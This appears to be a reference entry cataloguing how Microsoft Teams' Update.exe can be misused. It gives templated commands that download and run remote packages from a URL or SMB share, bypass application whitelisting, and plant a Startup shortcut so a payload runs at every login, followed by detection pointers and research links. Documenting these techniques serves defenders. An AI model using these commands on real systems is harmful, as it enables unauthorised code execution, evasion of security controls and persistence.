Update.exe
Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.
Paths
C:\Users\<username>\AppData\Local\Microsoft\Teams\update.exe
Commands
Download
The above binary will go to url and look for RELEASES file and download the nuget package.
Use case: Download binary
Privileges: User
Update.exe --download {REMOTEURL}AWL Bypass
The above binary will go to url and look for RELEASES file, download and install the nuget package.
Use case: Download and execute binary
Privileges: User
Update.exe --update={REMOTEURL}Execute
The above binary will go to url and look for RELEASES file, download and install the nuget package.
Use case: Download and execute binary
Privileges: User
Update.exe --update={REMOTEURL}AWL Bypass
The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Use case: Download and execute binary
Privileges: User
Update.exe --update={PATH_SMB:folder}Execute
The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Use case: Download and execute binary
Privileges: User
Update.exe --update={PATH_SMB:folder}AWL Bypass
The above binary will go to url and look for RELEASES file, download and install the nuget package.
Use case: Download and execute binary
Privileges: User
Update.exe --updateRollback={REMOTEURL}Execute
The above binary will go to url and look for RELEASES file, download and install the nuget package.
Use case: Download and execute binary
Privileges: User
Update.exe --updateRollback={REMOTEURL}AWL Bypass
Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Use case: Application Whitelisting Bypass
Privileges: User
Update.exe --processStart {PATH:.exe} --process-start-args "{CMD:args}"AWL Bypass
The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Use case: Download and execute binary
Privileges: User
Update.exe --updateRollback={PATH_SMB:folder}Execute
The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Use case: Download and execute binary
Privileges: User
Update.exe --updateRollback={PATH_SMB:folder}Execute
Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Use case: Execute binary
Privileges: User
Update.exe --processStart {PATH:.exe} --process-start-args "{CMD:args}"Execute
Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a shortcut to the specified executable in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.
Use case: Execute binary
Privileges: User
Update.exe --createShortcut={PATH:.exe} -l=StartupExecute
Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page.
Use case: Execute binary
Privileges: User
Update.exe --removeShortcut={PATH:.exe}-l=StartupDetection
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml
- IOC: Update.exe spawned an unknown process
Resources
- https://www.youtube.com/watch?v=rOP3hnkj7ls
- https://twitter.com/reegun21/status/1144182772623269889
- https://twitter.com/MrUn1k0d3r/status/1143928885211537408
- https://twitter.com/reegun21/status/1291005287034281990
- http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
- https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12
- https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/